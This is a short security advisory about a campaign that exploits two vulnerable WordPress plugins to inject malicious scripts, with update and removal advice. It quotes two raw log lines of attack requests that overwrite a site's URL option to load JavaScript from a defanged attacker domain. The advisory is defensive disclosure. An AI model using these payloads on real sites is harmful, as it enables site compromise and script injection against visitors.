Plugins Added to Malicious Campaign

Core Integrity Checksum for WordPress

We continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version <= 1.8.2)
  • Woocommerce User Email Verification.  (version <= 3.3.0  **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins. Public exploits already exist for all of the components listed above, and we highly encourage you to keep your software up to date to prevent any infection.

Payloads Used by Bots

  • Download WP Inventory Manager  
51.15.147.147 - action=save&siteurl=hxxps%3A%2F%2Fcdn.deliverymoretimes[.]info%2Fcdn.js%3Fty%3D1%26 [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php?page=wpim_manage_settings HTTP/1.1" 200 5 "-" "-"
  • Woocommerce User Email Verification
51.15.147.147 - wuev_form_type=siteurl&hxxps://cdn.deliverymoretimes[.]info/simpletype.js?ty=1& [25/Apr/2019:05:14:28 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 200 5 "-" "-"

Malicious Domains Injected So far

hxxps://cdn[.]deliverymoretimes[.]info/simpletype[.]js?ty=1

As always, we recommend adding a WAF as a second layer of protection. If you are using the plugin Woocommerce User Email Verification, it should be removed since the developer hasn’t fixed the “arbitrary options update”.

You May Also Like